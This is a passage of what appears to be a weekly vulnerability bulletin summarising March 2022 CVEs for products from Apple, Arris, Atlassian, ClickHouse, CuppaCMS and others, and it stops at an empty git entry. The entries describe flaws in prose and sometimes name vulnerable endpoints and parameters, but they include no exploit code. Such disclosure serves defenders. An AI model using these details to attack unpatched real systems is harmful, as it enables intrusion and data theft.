apple -- multiple_productsA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22615
MISC
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.2022-03-18not yet calculatedCVE-2022-22626
MISC
MISC
MISC
apple -- multiple_productsAn out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.2022-03-18not yet calculatedCVE-2022-22625
MISC
MISC
MISC
apple -- multiple_productsA memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption.2022-03-18not yet calculatedCVE-2022-22612
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsAn out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22611
MISC
MISC
MISC
MISC
MISC
apple -- multiple_productsThis issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application's permissions and access user data.2022-03-18not yet calculatedCVE-2022-22650
MISC
MISC
MISC
apple -- multiple_productsThe GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen.2022-03-18not yet calculatedCVE-2022-22652
MISC
apple -- multiple_products
 
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.2022-03-18not yet calculatedCVE-2022-22656
MISC
MISC
MISC
apple -- multiple_products
 
An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2021-30771
MISC
MISC
MISC
MISC
apple -- multiple_products
 
A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript.2022-03-18not yet calculatedCVE-2022-22589
MISC
MISC
MISC
MISC
MISC
apple -- multiple_products
 
A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges.2022-03-18not yet calculatedCVE-2022-22578
MISC
MISC
MISC
MISC
apple -- multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.2022-03-18not yet calculatedCVE-2022-22613
MISC
MISC
MISC
MISC
MISC
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22602
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22607
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22606
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22605
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22604
MISC
apple -- xcodeAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22603
MISC
apple -- xcode
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22608
MISC
apple -- xcode
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.2022-03-18not yet calculatedCVE-2022-22601
MISC
archivista -- dms
 
Cross-site Scripting (XSS) vulnerability in ArchivistaBox webclient allows an attacker to craft a malicious link, executing JavaScript in the context of a victim's browser. This issue affects all ArchivistaBox versions prior to 2022/I.2022-03-16not yet calculatedCVE-2021-42552
CONFIRM
argencoders-notevil -- argencoders-notevil
 
This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878).2022-03-17not yet calculatedCVE-2021-23771
MISC
MISC
ari_fancy_lightbox  -- ari_fancy_lightbox
 
The ARI Fancy Lightbox WordPress plugin before 1.3.9 does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting2022-03-14not yet calculatedCVE-2022-0161
MISC
CONFIRM
arm -- cortex_and_neoverse_processors
 
Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information.2022-03-13not yet calculatedCVE-2022-23960
CONFIRM
MISC
MLIST
arris -- routersArris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26990
MISC
arris -- routersArris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26991
MISC
arris -- routersArris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26993
MISC
arris -- routersArris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ddns function via the DdnsUserName, DdnsHostName, and DdnsPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26992
MISC
arris -- routers
 
Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pptp function via the pptpUserName and pptpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26994
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26998
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26995
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26996
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27000
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26997
MISC
arris -- tr3300Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26999
MISC
arris -- tr3300Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27001
MISC
arris -- tr3300
 
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27002
MISC
atlassian -- fisheye_and_crucibleThe jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability.2022-03-16not yet calculatedCVE-2021-43956
MISC
MISC
atlassian -- fisheye_and_crucibleAffected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9.2022-03-16not yet calculatedCVE-2021-43957
MISC
MISC
atlassian -- fisheye_and_crucible
 
The /rest-service-fecru/server-v1 resource in Fisheye and Crucible before version 4.8.9 allowed authenticated remote attackers to obtain information about installation directories via information disclosure vulnerability.2022-03-16not yet calculatedCVE-2021-43955
MISC
MISC
atlassian -- fisheye_and_crucible
 
Various rest resources in Fisheye and Crucible before version 4.8.9 allowed remote attackers to brute force user login credentials as rest resources did not check if users were beyond their max failed login limits and therefore required solving a CAPTCHA in addition to providing user credentials for authentication via a improper restriction of excess authentication attempts vulnerability.2022-03-16not yet calculatedCVE-2021-43958
MISC
MISC
atom -- cms
 
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.2022-03-15not yet calculatedCVE-2022-25489
MISC
atom -- cms
 
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.2022-03-15not yet calculatedCVE-2022-25487
MISC
atom -- cms
 
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.2022-03-15not yet calculatedCVE-2022-25488
MISC
automotive_grade_linux_kooky_koi -- automotive_grade_linux_kooky_koi
 
Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required.2022-03-18not yet calculatedCVE-2022-24595
MISC
axeda -- agent_and_desktop_server_for_windowsAxeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system.2022-03-16not yet calculatedCVE-2022-25246
MISC
MISC
axeda -- agent_and_desktop_server_for_windowsAxeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain commands to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to obtain full file-system access and remote code execution.2022-03-16not yet calculatedCVE-2022-25247
MISC
MISC
axeda -- agent_and_desktop_server_for_windowsWhen connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send a certain command to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to shut down a specific service.2022-03-16not yet calculatedCVE-2022-25250
MISC
MISC
axeda -- agent_and_desktop_server_for_windowsWhen connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) supplies the event log of the specific service.2022-03-16not yet calculatedCVE-2022-25248
MISC
MISC
axeda -- agent_and_desktop_server_for_windowsWhen connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) (disregarding Axeda agent v6.9.2 and v6.9.3) is vulnerable to directory traversal, which could allow a remote unauthenticated attacker to obtain file system read access via web server..2022-03-16not yet calculatedCVE-2022-25249
MISC
MISC
axeda -- agent_and_desktop_server_for_windowsWhen connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain XML messages to a specific port without proper authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to read and modify the affected product’s configuration.2022-03-16not yet calculatedCVE-2022-25251
MISC
MISC
axeda -- agent_and_desktop_server_for_windows
 
When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) when receiving certain input throws an exception. Services using said function do not handle the exception. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to crash the affected product.2022-03-16not yet calculatedCVE-2022-25252
MISC
MISC
bareos -- bareosBareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, a failed PAM authentication will leak a small amount of memory. An attacker that is able to use the PAM Console (i.e. by knowing the shared secret or via the WebUI) can flood the Director with failing login attempts which will eventually lead to an out-of-memory condition in which the Director will not work anymore. Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 contain a Bugfix for this problem. Users who are unable to upgrade may disable PAM authentication as a workaround.2022-03-15not yet calculatedCVE-2022-24756
MISC
CONFIRM
MISC
MISC
MISC
bareos -- bareos
 
Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, it will skip authorization checks completely. Expired accounts and accounts with expired passwords can still login. This problem will affect users that have PAM enabled. Currently there is no authorization (e.g. check for expired or disabled accounts), but only plain authentication (i.e. check if username and password match). Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 implement the authorization check that was previously missing. The only workaround is to make sure that authentication fails if the user is not authorized.2022-03-15not yet calculatedCVE-2022-24755
MISC
MISC
MISC
CONFIRM
MISC
bitbucket_pipeline_variable -- bitbucket_pipeline_variable
 
A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.2022-03-16not yet calculatedCVE-2021-20180
MISC
bodymen -- bodymen
 
The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897)2022-03-17not yet calculatedCVE-2022-25296
MISC
braintree -- sanitizeurl
 
The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function.2022-03-16not yet calculatedCVE-2021-23648
MISC
MISC
MISC
MISC
brocade -- fabric_os
 
A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files.2022-03-18not yet calculatedCVE-2020-15388
MISC
brocade -- fabric_os
 
The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program's standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials.2022-03-18not yet calculatedCVE-2021-27789
MISC
chainsafe -- libp2p-noise
 
`@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds.2022-03-17not yet calculatedCVE-2022-24759
MISC
MISC
CONFIRM
ckeditor4 -- ckeditor4CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.2022-03-16not yet calculatedCVE-2022-24729
MISC
CONFIRM
CONFIRM
ckeditor4 -- ckeditor4
 
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.2022-03-16not yet calculatedCVE-2022-24728
MISC
CONFIRM
MISC
CONFIRM
classcms -- classcms
 
Classcms v2.5 and below contains an arbitrary file upload via the component \class\classupload. This vulnerability allows attackers to execute code injection via a crafted .txt file.2022-03-18not yet calculatedCVE-2022-25581
MISC
clickhouse -- dbmsHeap buffer overflow in Clickhouse's LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call.2022-03-14not yet calculatedCVE-2021-43305
MISC
clickhouse -- dbmsDivide-by-zero in Clickhouse's Gorilla compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0.2022-03-14not yet calculatedCVE-2021-42391
MISC
clickhouse -- dbmsDivide-by-zero in Clickhouse's Delta compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0.2022-03-14not yet calculatedCVE-2021-42389
MISC
clickhouse -- dbmsHeap out-of-bounds read in Clickhouse's LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value ('offset') is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the source of the copy operation.2022-03-14not yet calculatedCVE-2021-42388
MISC
clickhouse -- dbmsDivide-by-zero in Clickhouse's DeltaDouble compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0.2022-03-14not yet calculatedCVE-2021-42390
MISC
clickhouse -- dbms
 
Heap buffer overflow in Clickhouse's LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits.2022-03-14not yet calculatedCVE-2021-43304
MISC
clickhouse -- dbms
 
Heap out-of-bounds read in Clickhouse's LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value ('offset') is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation.2022-03-14not yet calculatedCVE-2021-42387
MISC
cometd -- cometd
 
CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users' (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user's data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels.2022-03-15not yet calculatedCVE-2022-24721
MISC
CONFIRM
commonsbooking -- commonsbooking
 
The CommonsBooking WordPress plugin before 2.6.8 does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection2022-03-14not yet calculatedCVE-2022-0658
MISC
contact_form_x -- contact_form_x
 
Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4).2022-03-11not yet calculatedCVE-2022-25601
CONFIRM
CONFIRM
FEDORA
FEDORA
contao -- managed_edition
 
Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter.2022-03-18not yet calculatedCVE-2022-26265
MISC
countdown_coming_soon -- countdown_coming_soon
 
The Countdown, Coming Soon, Maintenance WordPress plugin before 2.2.9 does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.2022-03-14not yet calculatedCVE-2022-0601
CONFIRM
MISC
cri-o -- cri-o
 
A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed.2022-03-16not yet calculatedCVE-2022-0811
MISC
MISC
cuppacms -- cuppacmsCuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php.2022-03-15not yet calculatedCVE-2022-25498
MISC
cuppacms -- cuppacmsCuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.2022-03-15not yet calculatedCVE-2022-25485
MISC
cuppacms -- cuppacmsThe component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file.2022-03-15not yet calculatedCVE-2022-25495
MISC
cuppacms -- cuppacms
 
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.2022-03-15not yet calculatedCVE-2022-25486
MISC
cuppacms -- cuppacms
 
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.2022-03-15not yet calculatedCVE-2022-25497
MISC
cvrf-csaf-converter --cvrf-csaf-converter
 
CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter.2022-03-15not yet calculatedCVE-2022-27193
MISC
dcn_firewall -- dcme-520DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php.2022-03-18not yet calculatedCVE-2022-25389
MISC
dcn_firewall -- dcme-520
 
DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.2022-03-18not yet calculatedCVE-2022-25390
MISC
delete_marker_category_delete_map_and_copy_map -- delete_marker_category_delete_map_and_copy_map
 
Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3).2022-03-11not yet calculatedCVE-2022-25600
CONFIRM
CONFIRM
FEDORA
FEDORA
eos -- eos
 
EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin.2022-03-17not yet calculatedCVE-2022-26300
MISC
event_manager_and_tickets_selling_for_woocommerce -- event_manager_and_tickets_selling_for_woocommerce
 
The Event Manager and Tickets Selling for WooCommerce WordPress plugin before 3.5.8 does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks2022-03-14not yet calculatedCVE-2022-0478
CONFIRM
MISC
fasthttp -- fasthttp
 
The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.2022-03-17not yet calculatedCVE-2022-21221
MISC
MISC
MISC
MISC
MISC
fexsrv -- fexsrv
 
fexsrv in F*EX (aka Frams' Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution).2022-03-17not yet calculatedCVE-2020-15591
MISC
CONFIRM
fisco-bcos --fisco-bcos
 
FISCO-BCOS release-3.0.0-rc2 was discovered to contain an issue where a malicious node, via a malicious viewchange packet, will cause normal nodes to change view excessively and stop generating blocks.2022-03-17not yet calculatedCVE-2022-26534
MISC
fish -- fish
 
fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker's control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt.2022-03-14not yet calculatedCVE-2022-20001
MISC
CONFIRM
MISC
flexi -- flexi
 
The Flexi WordPress plugin before 4.20 does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting2022-03-14not yet calculatedCVE-2022-0449
MISC
forge -- forgeForge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.2022-03-18not yet calculatedCVE-2022-24772
MISC
MISC
CONFIRM
forge -- forgeForge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.2022-03-18not yet calculatedCVE-2022-24771
CONFIRM
MISC
forge -- forge
 
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.2022-03-18not yet calculatedCVE-2022-24773
MISC
CONFIRM
MISC
fuxa -- fuxa
 
A Server-Side Request Forgery (SSRF) attack in FUXA 1.1.3 can be carried out leading to the obtaining of sensitive information from the server's internal environment and services, often potentially leading to the attacker executing commands on the server.2022-03-16not yet calculatedCVE-2021-45851
MISC
fv_flowplayer_video_player -- fv_flowplayer_video_player
 
Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727).2022-03-18not yet calculatedCVE-2022-25607
CONFIRM
CONFIRM
gd_mylist -- gd_mylist
 
The GD Mylist WordPress plugin through 1.1.1 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0703
MISC
ge -- reason_clocksA code injection vulnerability exists in one of the webpages in GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06 that could allow an authenticated remote attacker to execute arbitrary code on the system.2022-03-18not yet calculatedCVE-2020-25197
CONFIRM
CONFIRM
ge -- reason_clocks
 
By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection.2022-03-18not yet calculatedCVE-2020-25193
CONFIRM
CONFIRM
getgrav -- grav
 
Cross-site Scripting (XSS) - Stored in GitHub repository getgrav/grav prior to 1.7.31.2022-03-15not yet calculatedCVE-2022-0970
MISC
CONFIRM
git -- git
 
